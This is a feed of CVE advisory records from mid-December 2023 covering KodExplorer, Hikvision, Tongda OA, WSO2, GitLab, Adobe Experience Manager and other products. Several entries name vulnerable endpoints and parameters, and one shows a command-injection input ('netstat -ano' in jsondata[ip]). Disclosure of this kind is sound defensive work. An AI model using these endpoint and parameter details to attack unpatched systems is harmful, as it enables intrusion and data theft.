Vulnerability ID : CVE-2023-6850

First published on : 16-12-2023 09:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6850
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/kalcaddle/KodExplorer/commit/5cf233f7556b442100cf67b5e92d57ceabb126c6 | source : cna@vuldb.com
https://github.com/kalcaddle/KodExplorer/releases/tag/4.52.01 | source : cna@vuldb.com
https://note.zhaoj.in/share/L38RNzUOwOtN | source : cna@vuldb.com
https://vuldb.com/?ctiid.248218 | source : cna@vuldb.com
https://vuldb.com/?id.248218 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-6851

First published on : 16-12-2023 11:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219.

CVE ID : CVE-2023-6851
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/kalcaddle/KodExplorer/commit/5cf233f7556b442100cf67b5e92d57ceabb126c6 | source : cna@vuldb.com
https://github.com/kalcaddle/KodExplorer/releases/tag/4.52.01 | source : cna@vuldb.com
https://note.zhaoj.in/share/D44UjzoFXYfi | source : cna@vuldb.com
https://vuldb.com/?ctiid.248219 | source : cna@vuldb.com
https://vuldb.com/?id.248219 | source : cna@vuldb.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-6852

First published on : 16-12-2023 12:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.

CVE ID : CVE-2023-6852
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/kalcaddle/KodExplorer/commit/5cf233f7556b442100cf67b5e92d57ceabb126c6 | source : cna@vuldb.com
https://github.com/kalcaddle/KodExplorer/releases/tag/4.52.01 | source : cna@vuldb.com
https://note.zhaoj.in/share/P6lQNyqQn3zY | source : cna@vuldb.com
https://vuldb.com/?ctiid.248220 | source : cna@vuldb.com
https://vuldb.com/?id.248220 | source : cna@vuldb.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-6853

First published on : 16-12-2023 12:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability.

CVE ID : CVE-2023-6853
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/kalcaddle/KodExplorer/commit/5cf233f7556b442100cf67b5e92d57ceabb126c6 | source : cna@vuldb.com
https://github.com/kalcaddle/KodExplorer/releases/tag/4.52.01 | source : cna@vuldb.com
https://note.zhaoj.in/share/oaYHbDTnPiU3 | source : cna@vuldb.com
https://vuldb.com/?ctiid.248221 | source : cna@vuldb.com
https://vuldb.com/?id.248221 | source : cna@vuldb.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-6887

First published on : 17-12-2023 01:15:27
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247.

CVE ID : CVE-2023-6887
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/daydust/vuln/blob/main/ForestBlog/Arbitrary_File_Upload_Vulnerability.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248247 | source : cna@vuldb.com
https://vuldb.com/?id.248247 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-6888

First published on : 17-12-2023 01:15:27
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability classified as critical was found in PHZ76 RtspServer 1.0.0. This vulnerability affects the function ParseRequestLine of the file RtspMesaage.cpp. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6888
Source : cna@vuldb.com
CVSS Score : 6.3

References :
http://www.huiyao.love/2023/12/08/rtspserver-stackoverflow-vulnerability/ | source : cna@vuldb.com
https://github.com/hu1y40/PoC/blob/main/rtspserver_stackoverflow_poc.py | source : cna@vuldb.com
https://vuldb.com/?ctiid.248248 | source : cna@vuldb.com
https://vuldb.com/?id.248248 | source : cna@vuldb.com

Vulnerability : CWE-121


Vulnerability ID : CVE-2023-6895

First published on : 17-12-2023 08:15:07
Last modified on : 18-12-2023 15:15:10

Description :
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6895
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/willchen0011/cve/blob/main/rce.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248254 | source : cna@vuldb.com
https://vuldb.com/?id.248254 | source : cna@vuldb.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2023-6885

First published on : 16-12-2023 23:15:40
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6885
Source : cna@vuldb.com
CVSS Score : 5.5

References :
https://github.com/Martinzb/cve/blob/main/sql.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248245 | source : cna@vuldb.com
https://vuldb.com/?id.248245 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-6898

First published on : 17-12-2023 11:15:08
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256.

CVE ID : CVE-2023-6898
Source : cna@vuldb.com
CVSS Score : 5.5

References :
https://github.com/Glunko/gaatitrack-courier-management-system_vulnerability/blob/main/sql_injection.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248256 | source : cna@vuldb.com
https://vuldb.com/?id.248256 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-6902

First published on : 17-12-2023 16:15:13
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260.

CVE ID : CVE-2023-6902
Source : cna@vuldb.com
CVSS Score : 5.5

References :
https://github.com/g1an123/POC/blob/main/Unauthorized%20file%20upload%20getshell.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248260 | source : cna@vuldb.com
https://vuldb.com/?id.248260 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-6907

First published on : 18-12-2023 04:15:51
Last modified on : 18-12-2023 14:05:17

Description :
A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability.

CVE ID : CVE-2023-6907
Source : cna@vuldb.com
CVSS Score : 5.4

References :
https://github.com/g1an123/POC/blob/main/Unauthorized%20file%20deletion.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248269 | source : cna@vuldb.com
https://vuldb.com/?id.248269 | source : cna@vuldb.com

Vulnerability : CWE-287


Vulnerability ID : CVE-2023-6891

First published on : 17-12-2023 04:15:07
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release.

CVE ID : CVE-2023-6891
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://peazip.github.io/changelog.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.248251 | source : cna@vuldb.com
https://vuldb.com/?id.248251 | source : cna@vuldb.com

Vulnerability : CWE-427


Vulnerability ID : CVE-2023-6886

First published on : 17-12-2023 01:15:27
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6886
Source : cna@vuldb.com
CVSS Score : 4.7

References :
https://github.com/xnx3/wangmarket/issues/8 | source : cna@vuldb.com
https://vuldb.com/?ctiid.248246 | source : cna@vuldb.com
https://vuldb.com/?id.248246 | source : cna@vuldb.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-6900

First published on : 17-12-2023 14:15:36
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6900
Source : cna@vuldb.com
CVSS Score : 4.6

References :
https://treasure-blarney-085.notion.site/DashMachine-Arbitrary-File-Deletion-ab44f2fe68e843c393ae9e0c1d487676 | source : cna@vuldb.com
https://vuldb.com/?ctiid.248258 | source : cna@vuldb.com
https://vuldb.com/?id.248258 | source : cna@vuldb.com

Vulnerability : CWE-24


Vulnerability ID : CVE-2023-6893

First published on : 17-12-2023 07:15:07
Last modified on : 18-12-2023 15:15:10

Description :
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:\ICPAS\Wnmp\WWW\php\conversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252.

CVE ID : CVE-2023-6893
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://github.com/willchen0011/cve/blob/main/download.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248252 | source : cna@vuldb.com
https://vuldb.com/?id.248252 | source : cna@vuldb.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-6894

First published on : 17-12-2023 08:15:06
Last modified on : 18-12-2023 15:15:10

Description :
A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability.

CVE ID : CVE-2023-6894
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://github.com/willchen0011/cve/blob/main/unaccess.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248253 | source : cna@vuldb.com
https://vuldb.com/?id.248253 | source : cna@vuldb.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2023-6899

First published on : 17-12-2023 13:15:42
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability.

CVE ID : CVE-2023-6899
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://treasure-blarney-085.notion.site/DashMachine-Unauthorized-RCE-931a35a81af9448ebe9fb4cd904d4a0c | source : cna@vuldb.com
https://vuldb.com/?ctiid.248257 | source : cna@vuldb.com
https://vuldb.com/?id.248257 | source : cna@vuldb.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-6904

First published on : 17-12-2023 23:15:44
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6904
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://vuldb.com/?ctiid.248266 | source : cna@vuldb.com
https://vuldb.com/?id.248266 | source : cna@vuldb.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-6905

First published on : 18-12-2023 00:15:11
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2023-6905
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://vuldb.com/?ctiid.248267 | source : cna@vuldb.com
https://vuldb.com/?id.248267 | source : cna@vuldb.com

Vulnerability : CWE-90


Source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability ID : CVE-2023-6838

First published on : 15-12-2023 10:15:10
Last modified on : 15-12-2023 13:41:51

Description :
Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests.

CVE ID : CVE-2023-6838
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 6.1

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-1233/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6839

First published on : 15-12-2023 11:15:48
Last modified on : 15-12-2023 13:41:51

Description :
Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response.

CVE ID : CVE-2023-6839
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 5.3

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1334/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-209


Vulnerability ID : CVE-2023-6911

First published on : 18-12-2023 09:15:05
Last modified on : 18-12-2023 14:05:17

Description :
Multiple WSO2 products have been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console.

CVE ID : CVE-2023-6911
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 4.8

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-1225/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6836

First published on : 15-12-2023 10:15:09
Last modified on : 15-12-2023 13:41:51

Description :
Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information.

CVE ID : CVE-2023-6836
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 4.6

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2020-0716/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-611


Vulnerability ID : CVE-2023-6835

First published on : 15-12-2023 10:15:09
Last modified on : 15-12-2023 13:42:13

Description :
Multiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated.

CVE ID : CVE-2023-6835
Source : ed10eef1-636d-4fbe-9993-6890dfa878f8
CVSS Score : 4.3

References :
https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2021/WSO2-2021-1357/ | source : ed10eef1-636d-4fbe-9993-6890dfa878f8

Vulnerability : CWE-20


Source : bosch.com

Vulnerability ID : CVE-2023-35867

First published on : 18-12-2023 13:15:07
Last modified on : 18-12-2023 14:05:17

Description :
An improper handling of a malformed API answer packets to API clients in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. To exploit this vulnerability an attacker has to replace an existing API server e.g. through Man-in-the-Middle attacks.

CVE ID : CVE-2023-35867
Source : psirt@bosch.com
CVSS Score : 5.9

References :
https://psirt.bosch.com/security-advisories/BOSCH-SA-092656-BT.html | source : psirt@bosch.com

Vulnerability : CWE-703


Vulnerability ID : CVE-2022-41677

First published on : 18-12-2023 13:15:06
Last modified on : 18-12-2023 14:05:17

Description :
An information disclosure vulnerability was discovered in Bosch IP camera devices allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and network settings of the device, disclosing possibly internal network settings if the device is connected to the internet.

CVE ID : CVE-2022-41677
Source : psirt@bosch.com
CVSS Score : 5.3

References :
https://psirt.bosch.com/security-advisories/bosch-sa-839739-BT.html | source : psirt@bosch.com

Vulnerability : CWE-284


Source : silabs.com

Vulnerability ID : CVE-2023-5310

First published on : 15-12-2023 16:15:46
Last modified on : 15-12-2023 16:53:06

Description :
A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device.

CVE ID : CVE-2023-5310
Source : product-security@silabs.com
CVSS Score : 5.7

References :
https://github.com/SiliconLabs/gecko_sdk/releases | source : product-security@silabs.com
https://siliconlabs.lightning.force.com/sfc/servlet.shepherd/document/download/069Vm0000005E7EIAU?%20operationContext=S1 | source : product-security@silabs.com

Vulnerability : CWE-754


Source : gitlab.com

Vulnerability ID : CVE-2023-6051

First published on : 15-12-2023 16:15:46
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag.

CVE ID : CVE-2023-6051
Source : cve@gitlab.com
CVSS Score : 5.7

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/431345 | source : cve@gitlab.com
https://hackerone.com/reports/2237165 | source : cve@gitlab.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-3907

First published on : 17-12-2023 23:15:43
Last modified on : 18-12-2023 14:05:22

Description :
A privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner

CVE ID : CVE-2023-3907
Source : cve@gitlab.com
CVSS Score : 4.9

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/418878 | source : cve@gitlab.com
https://hackerone.com/reports/2058934 | source : cve@gitlab.com

Vulnerability : CWE-269


Vulnerability ID : CVE-2023-5512

First published on : 15-12-2023 16:15:46
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names leading for incorrect representation in the UI.

CVE ID : CVE-2023-5512
Source : cve@gitlab.com
CVSS Score : 4.8

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/427827 | source : cve@gitlab.com
https://hackerone.com/reports/2194607 | source : cve@gitlab.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2023-3904

First published on : 15-12-2023 16:15:43
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards.

CVE ID : CVE-2023-3904
Source : cve@gitlab.com
CVSS Score : 4.3

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/418226 | source : cve@gitlab.com
https://hackerone.com/reports/2053154 | source : cve@gitlab.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2023-5061

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
An issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API.

CVE ID : CVE-2023-5061
Source : cve@gitlab.com
CVSS Score : 4.3

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/425521 | source : cve@gitlab.com
https://hackerone.com/reports/2125189 | source : cve@gitlab.com

Vulnerability : CWE-285


Source : adobe.com

Vulnerability ID : CVE-2023-47064

First published on : 15-12-2023 11:15:09
Last modified on : 18-12-2023 18:47:57

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-47064
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-47065

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:47:46

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-47065
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48440

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:47:36

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48440
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48442

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:47:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48442
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48443

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:46:50

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48443
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48444

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:19:44

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48444
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48445

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:19:36

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48445
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48446

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:19:29

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48446
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48447

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:18:38

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48447
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

